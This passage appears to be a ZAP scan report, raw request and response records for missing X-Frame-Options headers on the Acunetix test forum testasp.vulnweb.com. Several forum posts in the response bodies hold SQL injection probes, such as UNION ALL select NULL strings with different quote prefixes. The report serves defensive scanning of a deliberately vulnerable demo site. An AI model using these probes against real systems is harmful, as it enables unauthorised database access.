vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=23 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4149 |
| Response Body - size: 4,149 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=24 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4150 |
| Response Body - size: 4,150 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=25 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4150 |
| Response Body - size: 4,150 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=26 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4150 |
| Response Body - size: 4,150 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>) UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=27 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4151 |
| Response Body - size: 4,151 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>') UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=28 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4151 |
| Response Body - size: 4,151 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>") UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=29 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4132 |
| Response Body - size: 4,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img 